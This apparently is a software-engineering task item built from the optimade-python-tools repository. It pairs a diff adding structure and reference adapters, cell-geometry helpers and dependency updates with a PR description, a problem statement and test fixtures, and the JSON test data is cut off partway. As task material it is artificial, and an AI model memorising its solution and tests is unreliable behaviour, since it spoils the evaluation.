info, see https://www.wwpdb.org/documentation/file-format-content/format33/sect8.html#SCALEn + """ + if globals().get("np", None) is None: + warn(NUMPY_NOT_FOUND) + return None + + cell = np.asarray(cell) + + volume = np.dot(cell[0], np.cross(cell[1], cell[2])) + scale = [] + for i in range(3): + vector = np.cross(cell[(i + 1) % 3], cell[(i + 2) % 3]) / volume + scale.append(tuple(vector)) + return tuple(scale) + + +def fractional_coordinates( + cell: Tuple[Vector3D, Vector3D, Vector3D], cartesian_positions: List[Vector3D] +) -> List[Vector3D]: + """Returns fractional coordinates and wraps coordinates to be [0;1[ + + NOTE: Based on `ase.atoms:Atoms.get_scaled_positions()`. + """ + if globals().get("np", None) is None: + warn(NUMPY_NOT_FOUND) + return None + + cell = np.asarray(cell) + cartesian_positions = np.asarray(cartesian_positions) + + fractional = np.linalg.solve(cell.T, cartesian_positions.T).T + + # Expecting a bulk 3D structure here, note, this may change in the future. + # See `ase.atoms:Atoms.get_scaled_positions()` for ideas on how to handle lower dimensional structures. + # Furthermore, according to ASE we need to modulo 1.0 twice. + # This seems to be due to small floats % 1.0 becomes 1.0, hence twice makes it 0.0. + for i in range(3): + fractional[:, i] %= 1.0 + fractional[:, i] %= 1.0 + + return [tuple(position) for position in fractional] + + +def cell_to_cellpar(cell, radians=False): + """Returns the cell parameters [a, b, c, alpha, beta, gamma]. + + Angles are in degrees unless radian=True is used. + + NOTE: Based on `ase.geometry.cell:cell_to_cellpar()`. + """ + if globals().get("np", None) is None: + warn(NUMPY_NOT_FOUND) + return None + + cell = np.asarray(cell) + + lengths = [np.linalg.norm(vector) for vector in cell] + angles = [] + for i in range(3): + j = i - 1 + k = i - 2 + outer_product = lengths[j] * lengths[k] + if outer_product > 1e-16: + x_vector = np.dot(cell[j], cell[k]) / outer_product + angle = 180.0 / np.pi * np.arccos(x_vector) + else: + angle = 90.0 + angles.append(angle) + if radians: + angles = [angle * np.pi / 180 for angle in angles] + return np.array(lengths + angles) + + +def unit_vector(x): + """Return a unit vector in the same direction as x.""" + if globals().get("np", None) is None: + warn(NUMPY_NOT_FOUND) + return None + + y = np.array(x, dtype="float") + return y / np.linalg.norm(y) + + +def cellpar_to_cell(cellpar, ab_normal=(0, 0, 1), a_direction=None): + """Return a 3x3 cell matrix from cellpar=[a,b,c,alpha,beta,gamma]. + + Angles must be in degrees. + + The returned cell is orientated such that a and b + are normal to `ab_normal` and a is parallel to the projection of + `a_direction` in the a-b plane. + + Default `a_direction` is (1,0,0), unless this is parallel to + `ab_normal`, in which case default `a_direction` is (0,0,1). + + The returned cell has the vectors va, vb and vc along the rows. The + cell will be oriented such that va and vb are normal to `ab_normal` + and va will be along the projection of `a_direction` onto the a-b + plane. + + Example: + + >>> cell = cellpar_to_cell([1, 2, 4, 10, 20, 30], (0, 1, 1), (1, 2, 3)) + >>> np.round(cell, 3) + array([[ 0.816, -0.408, 0.408], + [ 1.992, -0.13 , 0.13 ], + [ 3.859, -0.745, 0.745]]) + + NOTE: Direct copy of `ase.geometry.cell:cellpar_to_cell()`. + """ + if globals().get("np", None) is None: + warn(NUMPY_NOT_FOUND) + return None + + if a_direction is None: + if np.linalg.norm(np.cross(ab_normal, (1, 0, 0))) < 1e-5: + a_direction = (0, 0, 1) + else: + a_direction = (1, 0, 0) + + # Define rotated X,Y,Z-system, with Z along ab_normal and X along + # the projection of a_direction onto the normal plane of Z. + a_direction_array = np.array(a_direction) + Z = unit_vector(ab_normal) + X = unit_vector(a_direction_array - np.dot(a_direction_array, Z) * Z) + Y = np.cross(Z, X) + + # Express va, vb and vc in the X,Y,Z-system + alpha, beta, gamma = 90.0, 90.0, 90.0 + if isinstance(cellpar, (int, float)): + a = b = c = cellpar + elif len(cellpar) == 1: + a = b = c = cellpar[0] + elif len(cellpar) == 3: + a, b, c = cellpar + else: + a, b, c, alpha, beta, gamma = cellpar + + # Handle orthorhombic cells separately to avoid rounding errors + eps = 2 * np.spacing(90.0, dtype=np.float64) # around 1.4e-14 + # alpha + if abs(abs(alpha) - 90) < eps: + cos_alpha = 0.0 + else: + cos_alpha = np.cos(alpha * np.pi / 180.0) + # beta + if abs(abs(beta) - 90) < eps: + cos_beta = 0.0 + else: + cos_beta = np.cos(beta * np.pi / 180.0) + # gamma + if abs(gamma - 90) < eps: + cos_gamma = 0.0 + sin_gamma = 1.0 + elif abs(gamma + 90) < eps: + cos_gamma = 0.0 + sin_gamma = -1.0 + else: + cos_gamma = np.cos(gamma * np.pi / 180.0) + sin_gamma = np.sin(gamma * np.pi / 180.0) + + # Build the cell vectors + va = a * np.array([1, 0, 0]) + vb = b * np.array([cos_gamma, sin_gamma, 0]) + cx = cos_beta + cy = (cos_alpha - cos_beta * cos_gamma) / sin_gamma + cz_sqr = 1.0 - cx * cx - cy * cy + assert cz_sqr >= 0 + cz = np.sqrt(cz_sqr) + vc = c * np.array([cx, cy, cz]) + + # Convert to the Cartesian x,y,z-system + abc = np.vstack((va, vb, vc)) + T = np.vstack((X, Y, Z)) + cell = np.dot(abc, T) + + return cell + + +def _pad_iter_of_iters( + iterable: Iterable[Iterable], + padding: float = None, + outer: Iterable = None, + inner: Iterable = None, +) -> Tuple[Iterable[Iterable], bool]: + """Turn any null/None values into a float in given iterable of iterables""" + try: + padding = float(padding) + except (TypeError, ValueError): + padding = float("nan") + + outer = outer if outer is not None else list + inner = inner if outer is not None else tuple + + padded_iterable = any( + value is None for inner_iterable in iterable for value in inner_iterable + ) + + if padded_iterable: + padded_iterable_of_iterables = [] + for inner_iterable in iterable: + new_inner_iterable = inner( + value if value is not None else padding for value in inner_iterable + ) + padded_iterable_of_iterables.append(new_inner_iterable) + iterable = outer(padded_iterable_of_iterables) + + return iterable, padded_iterable + + +def pad_positions( + positions: List[Vector3D], padding: float = None +) -> Tuple[List[Vector3D], bool]: + """Turn any null/None values into a float in given list of positions""" + return _pad_iter_of_iters( + iterable=positions, padding=padding, outer=list, inner=tuple, + ) + + +def pad_cell( + lattice_vectors: Tuple[Vector3D, Vector3D, Vector3D], padding: float = None +) -> Tuple[Tuple[Vector3D, Vector3D, Vector3D], bool]: + """Turn any null/None values into a float in given tuple of lattice_vectors""" + return _pad_iter_of_iters( + iterable=lattice_vectors, padding=padding, outer=tuple, inner=tuple, + ) diff --git a/optimade/server/config.py b/optimade/server/config.py index 30db5dfb..078d9cbb 100644 --- a/optimade/server/config.py +++ b/optimade/server/config.py @@ -1,5 +1,6 @@ # pylint: disable=no-self-argument import json +import logging from typing import Optional, Dict, List try: @@ -15,6 +16,7 @@ from optimade.models import Implementation, Provider DEFAULT_CONFIG_FILE_PATH = str(Path.home().joinpath(".optimade.json")) +logger = logging.getLogger("optimade") class NoFallback(Exception): @@ -109,7 +111,7 @@ class ServerConfig(BaseSettings): ) @root_validator(pre=True) - def load_default_settings(cls, values): + def load_default_settings(cls, values): # pylint: disable=no-self-argument """ Loads settings from a root file if available and uses that as defaults in place of built in defaults @@ -119,8 +121,13 @@ class ServerConfig(BaseSettings): new_values = {} if config_file_path.exists() and config_file_path.is_file(): + logger.debug("Found config file at: %s", config_file_path) with open(config_file_path) as f: new_values = json.load(f) + else: + logger.debug( # pragma: no cover + "Did not find config file at: %s", config_file_path + ) new_values.update(values) diff --git a/setup.py b/setup.py index 0a59ced8..1ec8576b 100644 --- a/setup.py +++ b/setup.py @@ -4,19 +4,30 @@ from setuptools import setup, find_packages module_dir = Path(__file__).resolve().parent # Dependencies -mongo_deps = ["pymongo~=3.10", "mongomock~=3.19"] -server_deps = ["uvicorn", "Jinja2~=2.11"] + mongo_deps +# Server minded django_deps = ["django>=2.2.9,<4.0"] elastic_deps = ["elasticsearch-dsl>=6.4,<8.0"] +mongo_deps = ["pymongo~=3.10", "mongomock~=3.19"] +server_deps = ["uvicorn", "Jinja2~=2.11"] + mongo_deps + +# Client minded +aiida_deps = ["aiida-core~=1.1"] +ase_deps = ["ase~=3.19"] +cif_deps = ["numpy~=1.18"] +pdb_deps = cif_deps +pymatgen_deps = ["pymatgen~=2020.3"] +client_deps = cif_deps + +# General testing_deps = [ - "pytest~=5.3", + "pytest~=5.4", "pytest-cov", "codecov", "openapi-spec-validator", "jsondiff", ] + server_deps -dev_deps = ["pylint", "black", "pre-commit", "invoke"] + testing_deps -all_deps = dev_deps + django_deps + elastic_deps +dev_deps = ["pylint", "black", "pre-commit", "invoke"] + testing_deps + client_deps +all_deps = dev_deps + django_deps + elastic_deps + aiida_deps + ase_deps + pymatgen_deps setup( name="optimade", @@ -44,8 +55,8 @@ setup( ], python_requires=">=3.6", install_requires=[ - "lark-parser~=0.8.1", - "fastapi~=0.52", + "lark-parser~=0.8.5", + "fastapi~=0.53", "pydantic~=1.4", "email_validator", "requests~=2.23", @@ -54,11 +65,17 @@ setup( extras_require={ "all": all_deps, "dev": dev_deps, - "server": server_deps, "testing": testing_deps, + "server": server_deps, + "client": client_deps, "django": django_deps, "elastic": elastic_deps, "mongo": mongo_deps, + "aiida": aiida_deps, + "ase": ase_deps, + "cif": cif_deps, + "pdb": pdb_deps, + "pymatgen": pymatgen_deps, }, entry_points={ "console_scripts": ["optimade_validator=optimade.validator:validate"]
Add adapters - Base design + 'structures' (+ 'references'... sort of) The goal of the adapters is to contain a conversion or adaptation ability in a single Python class. The class will be a proxy for `optimade.models.EntryResource`, where the specific entries will take the place, e.g., `StructureResource`. In this way, one can instatiate the adapter class with a JSON resource object matching it, and get all the properties as attributes. E.g., one could get the lattice vectors of a structure then by calling `structures_adapter_class_object.attributes.lattice_vectors`. The reason to not have the adapter class be a direct link or subclass of the model class, is to not inherit all that comes with it, i.e., do not inherit `pyndantic`'s `BaseModel`, etc. While it can trip most IDEs, it is a more elegant solution that opens the doors to other possibilities, in my opinion. Besides being a handy wrapper for an entity resource object for a client, it also serves as a converter/adapter to other known and widely used libraries for the specific entity type. For a structures resource object, this may be libraries such as pymatgen, ASE, AiiDA, etc... It may also be nice to be able to convert the structures resource object to a Crystallographic Information File (CIF) file or other. These adapter/conversion functions may be added in a separate file and then referenced in the adapter class. Thus, the adapter class stays small at first glance, but spreads its tentacles wide throughout both the current package, but also a multitude of other libraries, packages, and data formats. In general, whenever the adapter class tries to get an attribute, it goes through the following steps: 1. If the attribute starts with `get_`, try to look up if this is a known conversion, then perform the conversion and return it as a string or specific package/library Python class. 2. Try to fetch the OPTIMADE model property. 3. Raise AttributeError if the attribute is still unknown, i.e., the previous steps failed and didn't raise already. --- Missing parts of this PR: - Add tests: - [X] General tests for the adapter class. - Tests for each converter function: - [x] AiiDA - [x] ASE - [x] CIF - [x] PDB - [x] PDBx/mmCIF - [x] pymatgen - [x] Generalize the adapter main class and have `Structure` inherit from it. - [x] Add `Reference`. (Currently added as an empty inheritence, meaning there are currently no conversions available for `Reference`). Helpful additions/corrections to this PR: - Optimize the various conversion functions (especially `get_cif` and `get_pbdx_mmcif`). - Add more well-known or much used data format converters and packages/libraries. (Keeping in mind that some of these libraries have a large quantity of converters already, e.g., ASE already converts to PDB and CIF formats, and so therefore these should only be included if going through, e.g., ASE, may end in a loss of data - I may not have been entirely strict enough with this myself already 😅).
**Title** Add unified entry adapters, conversion utilities, and CI support for optional scientific libraries **Problem** The package needed a consistent way to expose OPTIMADE resources as objects from popular scientific libraries (e.g., AiiDA, ASE, CIF, PDB, pymatgen). Without a proper adapter layer the conversions were unavailable, and the continuous‑integration pipelines never exercised them, leaving potential import‑time failures undetected. Additionally, the server configuration loader gave no feedback when a user‑config file was missing. **Root Cause** Conversion logic was added without a generic adapter base, without exposing it through the public API, and without preparing the test environment for the optional back‑ends. CI only installed a minimal set of dependencies and provisioned MongoDB, so imports of heavy optional packages failed silently. The config loader swallowed missing‑file situations without logging. **Fix / Expected Behavior** - Introduce a lazy base adapter that proxies an OPTIMADE entry, handles attribute access, and performs on‑demand conversion via `as_<format>` calls. - Provide concrete adapters for *Structure* and *Reference* resources, each registering conversion functions for AiiDA, ASE, CIF, PDB/PDBx‑mmCIF, and pymatgen. - Ensure conversion functions raise a clear `ConversionError` when the required external library is not installed. - Export the new adapters through the package’s public namespace. - Add an AiiDA profile template and a small setup script to create a temporary AiiDA environment for testing. - Extend CI workflows: start a PostgreSQL service, install all optional dependencies eagerly, run the newly added adapter tests, and update dependency versions (lark‑parser, fastapi, pytest, etc.). - Add debug logging to the server configuration loader and emit a message when the configuration file cannot be found. **Risk & Validation** - Optional heavy dependencies increase installation time; eager installation is confined to CI, while normal installs remain unchanged. - Conversion functions may emit warnings when libraries are absent; unit tests verify correct handling of both present and missing dependencies. - CI now includes additional services (PostgreSQL) and runs the adapter test suite; successful CI runs and unchanged existing test coverage confirm the change’s safety.
241
Materials-Consortia/optimade-python-tools
diff --git a/pytest.ini b/pytest.ini index 9628d74e..a04215eb 100644 --- a/pytest.ini +++ b/pytest.ini @@ -4,3 +4,4 @@ filterwarnings = ignore:.*"@coroutine" decorator is deprecated since Python 3.8, use "async def" instead.*:DeprecationWarning ignore:.*Using or importing the ABCs from 'collections' instead of from 'collections.abc' is deprecated.*:DeprecationWarning ignore:.*the imp module is deprecated in favour of importlib.*:DeprecationWarning + ignore:.*not found, cannot convert structure.*:UserWarning diff --git a/tests/adapters/references/conftest.py b/tests/adapters/references/conftest.py new file mode 100644 index 00000000..52fbe3f3 --- /dev/null +++ b/tests/adapters/references/conftest.py @@ -0,0 +1,28 @@ +import json +from pathlib import Path +from random import choice + +import pytest + +from optimade.adapters.references import Reference + + +@pytest.fixture +def RAW_REFERENCES(): + """Read and return raw_references.json""" + with open( + Path(__file__).parent.joinpath("raw_test_references.json"), "r" + ) as raw_data: + return json.load(raw_data) + + +@pytest.fixture +def raw_reference(RAW_REFERENCES): + """Return random raw reference from raw_references.json""" + return choice(RAW_REFERENCES) + + +@pytest.fixture +def reference(raw_reference): + """Create and return adapters.Reference""" + return Reference(raw_reference) diff --git a/tests/adapters/references/raw_test_references.json b/tests/adapters/references/raw_test_references.json new file mode 100644 index 00000000..a3f46d81 --- /dev/null +++ b/tests/adapters/references/raw_test_references.json @@ -0,0 +1,56 @@ +[ + { + "id": "dijkstra1968", + "type": "references", + "attributes": { + "last_modified": "2019-11-12T14:24:37.331000", + "authors": [ + { + "name": "Edsger W. Dijkstra", + "firstname": "Edsger", + "lastname": "Dijkstra" + } + ], + "doi": "10.1145/362929.362947", + "journal": "Communications of the ACM", + "title": "Go To Statement Considered Harmful", + "year": "1968" + } + }, + { + "id": "maddox1988", + "type": "references", + "attributes": { + "last_modified": "2019-11-27T14:24:37.331000", + "authors": [ + { + "name": "John Maddox", + "firstname": "John", + "lastname": "Maddox" + } + ], + "doi": "10.1038/335201a0", + "journal": "Nature", + "title": "Crystals From First Principles", + "year": "1988" + } + }, + { + "id": "dummy/2019", + "type": "references", + "attributes": { + "last_modified": "2019-11-23T14:24:37.332000", + "authors": [ + { + "name": "A Nother", + "firstname": "A", + "lastname": "Nother" + } + ], + "doi": "10.1038/00000", + "journal": "JACS", + "title": "Dummy reference that should remain orphaned from all structures for testing purposes", + "year": "2019" + } + } +] \ No newline at end of file diff --git a/tests/adapters/references/test_references.py b/tests/adapters/references/test_references.py new file mode 100644 index 00000000..aa18871d --- /dev/null +++ b/tests/adapters/references/test_references.py @@ -0,0 +1,86 @@ +import pytest + +from optimade.adapters import Reference +from optimade.models import ReferenceResource + + +class TestReference: + """Test Reference adapter""" + + def test_instantiate(self, RAW_REFERENCES): + """Try instantiating Reference for all raw test references""" + for reference in RAW_REFERENCES: + new_Reference = Reference(reference) + assert isinstance(new_Reference.entry, ReferenceResource) + + def test_setting_entry(self, capfd, RAW_REFERENCES): + """Make sure entry can only be set once""" + reference = Reference(RAW_REFERENCES[0]) + reference.entry = RAW_REFERENCES[1] + captured = capfd.readouterr() + assert "entry can only be set once and is already set." in captured.out + + @pytest.mark.skip( + "Currently, there are no conversion types available for references" + ) + def test_convert(self, reference): + """Test convert() works + Choose currently known entry type - must be updated if no longer available. + """ + if not reference._type_converters: + pytest.fail("_type_converters is seemingly empty. This should not be.") + + chosen_type = "SOME_VALID_TYPE" + if chosen_type not in reference._type_converters: + pytest.fail( + f"{chosen_type} not found in _type_converters: {reference._type_converters} - " + "please update test tests/adapters/references/test_references.py:TestReference." + "test_convert()" + ) + + converted_reference = reference.convert(chosen_type) + assert isinstance(converted_reference, (str, None.__class__)) + assert converted_reference == reference._converted[chosen_type] + + def test_convert_wrong_format(self, reference): + """Test AttributeError is raised if format does not exist""" + nonexistant_format = 0 + right_wrong_format_found = False + while not right_wrong_format_found: + if str(nonexistant_format) not in reference._type_converters: + nonexistant_format = str(nonexistant_format) + right_wrong_format_found = True + else: + nonexistant_format += 1 + + with pytest.raises( + AttributeError, + match=f"Non-valid entry type to convert to: {nonexistant_format}", + ): + reference.convert(nonexistant_format) + + def test_getattr_order(self, reference): + """The order of getting an attribute should be: + 1. `as_<entry type format>` + 2. `<entry type attribute>` + 3. `<entry type attributes attributes>` + 3. `raise AttributeError with custom message` + """ + # If passing attribute starting with `as_`, it should call `self.convert()` + with pytest.raises( + AttributeError, match=f"Non-valid entry type to convert to: " + ): + reference.as_ + + # If passing valid ReferenceResource attribute, it should return said attribute + for attribute, attribute_type in ( + ("id", str), + ("authors", list), + ("attributes.authors", list), + ): + assert isinstance(getattr(reference, attribute), attribute_type) + + # Otherwise, it should raise AttributeError + for attribute in ("nonexistant_attribute", "attributes.nonexistant_attribute"): + with pytest.raises(AttributeError, match=f"Unknown attribute: {attribute}"): + getattr(reference, attribute) diff --git a/tests/adapters/structures/__init__.py b/tests/adapters/structures/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/tests/adapters/structures/conftest.py b/tests/adapters/structures/conftest.py new file mode 100644 index 00000000..72b51434 --- /dev/null +++ b/tests/adapters/structures/conftest.py @@ -0,0 +1,64 @@ +import json +from pathlib import Path +from random import choice +from typing import List + +import pytest + +from optimade.adapters.structures import Structure + + +@pytest.fixture +def RAW_STRUCTURES() -> List[dict]: + """Read and return raw_structures.json""" + with open( + Path(__file__).parent.joinpath("raw_test_structures.json"), "r" + ) as raw_data: + return json.load(raw_data) + + +@pytest.fixture +def SPECIAL_SPECIES_STRUCTURES() -> List[dict]: + """Read and return special_species.json""" + with open(Path(__file__).parent.joinpath("special_species.json"), "r") as raw_data: + return json.load(raw_data) + + +@pytest.fixture +def raw_structure(RAW_STRUCTURES) -> dict: + """Return random raw structure from raw_structures.json""" + return choice(RAW_STRUCTURES) + + +@pytest.fixture +def structure(raw_structure) -> Structure: + """Create and return adapters.Structure""" + return Structure(raw_structure) + + +@pytest.fixture +def structures(RAW_STRUCTURES) -> List[Structure]: + """Create and return list of adapters.Structure""" + return [Structure(_) for _ in RAW_STRUCTURES] + + +@pytest.fixture +def null_position_structure(raw_structure) -> Structure: + """Create and return adapters.Structure with sites that have None values""" + raw_structure["attributes"]["cartesian_site_positions"][0] = [None] * 3 + if "structure_features" in raw_structure["attributes"]: + if "unknown_positions" not in raw_structure["attributes"]["structure_features"]: + raw_structure["attributes"]["structure_features"].append( + "unknown_positions" + ) + else: + raw_structure["attributes"]["structure_feature"] = ["unknown_positions"] + return Structure(raw_structure) + + +@pytest.fixture +def null_lattice_vector_structure(raw_structure) -> Structure: + """Create and return adapters.Structure with lattice_vectors that have None values""" + raw_structure["attributes"]["lattice_vectors"][0] = [None] * 3 + raw_structure["attributes"]["dimension_types"][0] = 0 + return Structure(raw_structure) diff --git a/tests/adapters/structures/raw_test_structures.json b/tests/adapters/structures/raw_test_structures.json new file mode 100644 index 00000000..00e0a391 --- /dev/null +++ b/tests/adapters/structures/raw_test_structures.json @@ -0,0 +1,3695 @@ +[ + { + "id": "mpf_1", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.331000", + "elements": [ + "Ac" + ], + "nelements": 1, + "elements_ratios": [ + 1 + ], + "chemical_formula_descriptive": "Ac", + "chemical_formula_reduced": "Ac", + "chemical_formula_anonymous": "A", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 1.2503264826932692, + 0, + 0 + ], + [ + 0, + 9.888509716321765, + 0 + ], + [ + 0, + 0, + 0.2972637673241818 + ] + ], + "cartesian_site_positions": [ + [ + 0.17570227444196573, + 0.17570227444196573, + 0.17570227444196573 + ] + ], + "nsites": 1, + "species_at_sites": [ + "Ac" + ], + "species": [ + { + "name": "Ac", + "chemical_symbols": [ + "Ac" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ac" + }, + "relationships": { + "references": { + "data": [ + { + "id": "dijkstra1968", + "type": "references" + } + ] + } + } + }, + { + "id": "mpf_2", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.331000", + "elements": [ + "Ac", + "Ag", + "Ir" + ], + "nelements": 3, + "elements_ratios": [ + 0.5, + 0.25, + 0.25 + ], + "chemical_formula_descriptive": "Ac2AgIr", + "chemical_formula_reduced": "Ac2AgIr", + "chemical_formula_anonymous": "A2BC", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 8.79234151692028, + 0, + 0 + ], + [ + 0, + 2.7335844428185343, + 0 + ], + [ + 0, + 0, + 6.350176421077278 + ] + ], + "cartesian_site_positions": [ + [ + 0.2096302780439051, + 0.2096302780439051, + 0.2096302780439051 + ], + [ + 0.2096302780439051, + 0.2096302780439051, + 0.2096302780439051 + ], + [ + 0.2096302780439051, + 0.2096302780439051, + 0.2096302780439051 + ], + [ + 0.2096302780439051, + 0.2096302780439051, + 0.2096302780439051 + ] + ], + "nsites": 4, + "species_at_sites": [ + "Ac", + "Ac", + "Ag", + "Ir" + ], + "species": [ + { + "name": "Ac", + "chemical_symbols": [ + "Ac" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Ag", + "chemical_symbols": [ + "Ag" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Ir", + "chemical_symbols": [ + "Ir" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ac-Ag-Ir" + }, + "relationships": { + "references": { + "data": [ + { + "id": "dijkstra1968", + "type": "references" + } + ] + } + } + }, + { + "id": "mpf_3", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.331000", + "elements": [ + "Ac", + "Ag", + "Pb" + ], + "nelements": 3, + "elements_ratios": [ + 0.5, + 0.25, + 0.25 + ], + "chemical_formula_descriptive": "Ac2AgPb", + "chemical_formula_reduced": "Ac2AgPb", + "chemical_formula_anonymous": "A2BC", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 7.698325441636717, + 0, + 0 + ], + [ + 0, + 3.9419030762941096, + 0 + ], + [ + 0, + 0, + 0.5746646140691603 + ] + ], + "cartesian_site_positions": [ + [ + 0.6522459815095935, + 0.6522459815095935, + 0.6522459815095935 + ], + [ + 0.6522459815095935, + 0.6522459815095935, + 0.6522459815095935 + ], + [ + 0.6522459815095935, + 0.6522459815095935, + 0.6522459815095935 + ], + [ + 0.6522459815095935, + 0.6522459815095935, + 0.6522459815095935 + ] + ], + "nsites": 4, + "species_at_sites": [ + "Ac", + "Ac", + "Ag", + "Pb" + ], + "species": [ + { + "name": "Ac", + "chemical_symbols": [ + "Ac" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Ag", + "chemical_symbols": [ + "Ag" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Pb", + "chemical_symbols": [ + "Pb" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ac-Ag-Pb" + }, + "relationships": { + "references": { + "data": [ + { + "id": "maddox1988", + "type": "references" + } + ] + } + } + }, + { + "id": "mpf_23", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.335000", + "elements": [ + "Ac", + "Mg" + ], + "nelements": 2, + "elements_ratios": [ + 0.6666666666666666, + 0.3333333333333333 + ], + "chemical_formula_descriptive": "Ac2Mg", + "chemical_formula_reduced": "Ac2Mg", + "chemical_formula_anonymous": "A2B", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 1.2755343366952576, + 0, + 0 + ], + [ + 0, + 5.82414982265072, + 0 + ], + [ + 0, + 0, + 0.8392960659156112 + ] + ], + "cartesian_site_positions": [ + [ + 0.5399745988507391, + 0.5399745988507391, + 0.5399745988507391 + ], + [ + 0.5399745988507391, + 0.5399745988507391, + 0.5399745988507391 + ], + [ + 0.5399745988507391, + 0.5399745988507391, + 0.5399745988507391 + ] + ], + "nsites": 3, + "species_at_sites": [ + "Ac", + "Ac", + "Mg" + ], + "species": [ + { + "name": "Ac", + "chemical_symbols": [ + "Ac" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Mg", + "chemical_symbols": [ + "Mg" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ac-Mg" + } + }, + { + "id": "mpf_30", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.337000", + "elements": [ + "Ac", + "O" + ], + "nelements": 2, + "elements_ratios": [ + 0.4, + 0.6 + ], + "chemical_formula_descriptive": "Ac2O3", + "chemical_formula_reduced": "Ac2O3", + "chemical_formula_anonymous": "A3B2", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 5.270508031864836, + 0, + 0 + ], + [ + 0, + 7.390955992107494, + 0 + ], + [ + 0, + 0, + 3.0995955580253574 + ] + ], + "cartesian_site_positions": [ + [ + 0.15817967032742697, + 0.15817967032742697, + 0.15817967032742697 + ], + [ + 0.15817967032742697, + 0.15817967032742697, + 0.15817967032742697 + ], + [ + 0.15817967032742697, + 0.15817967032742697, + 0.15817967032742697 + ], + [ + 0.15817967032742697, + 0.15817967032742697, + 0.15817967032742697 + ], + [ + 0.15817967032742697, + 0.15817967032742697, + 0.15817967032742697 + ] + ], + "nsites": 5, + "species_at_sites": [ + "Ac", + "Ac", + "O", + "O", + "O" + ], + "species": [ + { + "name": "Ac", + "chemical_symbols": [ + "Ac" + ], + "concentration": [ + 1 + ] + }, + { + "name": "O", + "chemical_symbols": [ + "O" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ac-O" + } + }, + { + "id": "mpf_110", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.351000", + "elements": [ + "Ac", + "Cu", + "F", + "O" + ], + "nelements": 4, + "elements_ratios": [ + 0.2, + 0.2, + 0.2, + 0.4 + ], + "chemical_formula_descriptive": "AcCuO2F", + "chemical_formula_reduced": "AcCuO2F", + "chemical_formula_anonymous": "A2BCD", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 8.877504144188517, + 0, + 0 + ], + [ + 0, + 6.281098675533934, + 0 + ], + [ + 0, + 0, + 0.9199940132786888 + ] + ], + "cartesian_site_positions": [ + [ + 0.27842674271448375, + 0.27842674271448375, + 0.27842674271448375 + ], + [ + 0.27842674271448375, + 0.27842674271448375, + 0.27842674271448375 + ], + [ + 0.27842674271448375, + 0.27842674271448375, + 0.27842674271448375 + ], + [ + 0.27842674271448375, + 0.27842674271448375, + 0.27842674271448375 + ], + [ + 0.27842674271448375, + 0.27842674271448375, + 0.27842674271448375 + ] + ], + "nsites": 5, + "species_at_sites": [ + "Ac", + "Cu", + "F", + "O", + "O" + ], + "species": [ + { + "name": "Ac", + "chemical_symbols": [ + "Ac" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Cu", + "chemical_symbols": [ + "Cu" + ], + "concentration": [ + 1 + ] + }, + { + "name": "F", + "chemical_symbols": [ + "F" + ], + "concentration": [ + 1 + ] + }, + { + "name": "O", + "chemical_symbols": [ + "O" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ac-Cu-F-O" + } + }, + { + "id": "mpf_200", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.365000", + "elements": [ + "Ag" + ], + "nelements": 1, + "elements_ratios": [ + 1 + ], + "chemical_formula_descriptive": "Ag", + "chemical_formula_reduced": "Ag", + "chemical_formula_anonymous": "A", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 9.637799319633432, + 0, + 0 + ], + [ + 0, + 6.587212108623569, + 0 + ], + [ + 0, + 0, + 9.773065370403186 + ] + ], + "cartesian_site_positions": [ + [ + 0.06033221863150484, + 0.06033221863150484, + 0.06033221863150484 + ] + ], + "nsites": 1, + "species_at_sites": [ + "Ag" + ], + "species": [ + { + "name": "Ag", + "chemical_symbols": [ + "Ag" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ag" + } + }, + { + "id": "mpf_220", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.369000", + "elements": [ + "Ag", + "Br", + "Cl", + "Te" + ], + "nelements": 4, + "elements_ratios": [ + 0.625, + 0.0625, + 0.0625, + 0.25 + ], + "chemical_formula_descriptive": "Ag10Te4BrCl", + "chemical_formula_reduced": "Ag10Te4BrCl", + "chemical_formula_anonymous": "A10B4CD", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 5.327614134703666, + 0, + 0 + ], + [ + 0, + 1.8722403722833025, + 0 + ], + [ + 0, + 0, + 4.493462985508826 + ] + ], + "cartesian_site_positions": [ + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 